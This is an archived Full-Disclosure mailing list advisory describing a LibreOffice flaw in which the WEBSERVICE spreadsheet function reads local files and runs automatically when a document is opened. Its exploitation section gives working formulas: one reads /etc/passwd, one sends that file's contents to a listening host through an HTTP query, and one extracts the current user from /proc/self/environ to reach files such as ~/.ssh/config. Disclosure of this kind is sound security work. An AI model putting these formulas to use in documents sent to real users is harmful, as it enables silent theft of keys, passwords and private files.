lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 7 Feb 2018 19:39:38 +0300
From: Mikhail Klementev <jollheef@...eup.net>
To: fulldisclosure@...lists.org
Subject: [FD] libreoffice remote arbitrary file disclosure

Hello,

After I know that the reported vulnerability was already known to developers,
but they did not include trivial fix to 6.0, but (as the developer said, I did
not check it byself) include to 5.4.5 (it means this is a silent fixed 
vulnerability) with a month lag between updates I think it's more correct to 
full disclose it.

PoC: https://github.com/jollheef/libreoffice-remote-arbitrary-file-disclosure

# Vulnerability description

## First part

LibreOffice supports COM.MICROSOFT.WEBSERVICE function:

    https://support.office.com/en-us/article/webservice-function-0546a35a-ecc6-4739-aed7-c0b7ce1562c4

The function is required to obtain data by URL, usually used as:

    =FILTERXML(WEBSERVICE("http://api.openweathermap.org/data/2.5/forecast?q=Copenhagen,dk&mode=xml&units=metric");"number(/weatherdata/forecast/time[2]/temperature/@...ue)")

In original:

    For protocols that are not supported, such as ftp: // or file: //, WEBSERVICE returns the #VALUE! error value.

In LibreOffice, these restrictions are not implemented.

## Second part

By default the cells are not updated, but if you specify the cell type like ~error, then the cell will be updated when you open document.

# Exploitation

To read file you need just:

    =WEBSERVICE("/etc/passwd")

This function can also be used to send a file:

    =WEBSERVICE("http://localhost:6000/?q=" & WEBSERVICE("/etc/passwd"))

For successful operation, you need to send the files of the current user, so you need to retrieve current user home path.

    =MID(WEBSERVICE("/proc/self/environ"), FIND("USER=", WEBSERVICE("/proc/self/environ")) + 5, SEARCH(CHAR(0), WEBSERVICE("/proc/self/environ"), FIND("USER=", WEBSERVICE("/proc/self/environ")))-FIND("USER=",

Also you can parse other files too, like a ~/.ssh/config or something like that.

For other than LibreOffice Calc formats you just need embed calc object to other document (I checked it works).

# Impact

It is easy to send any files with keys, passwords and anything else. 100% success rate, absolutely silent, support all modern versions of LibreOffice and may be embedded in almost all formats supporting by LO.

Download attachment "signature.asc" of type "application/pgp-signature" (834 bytes)


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists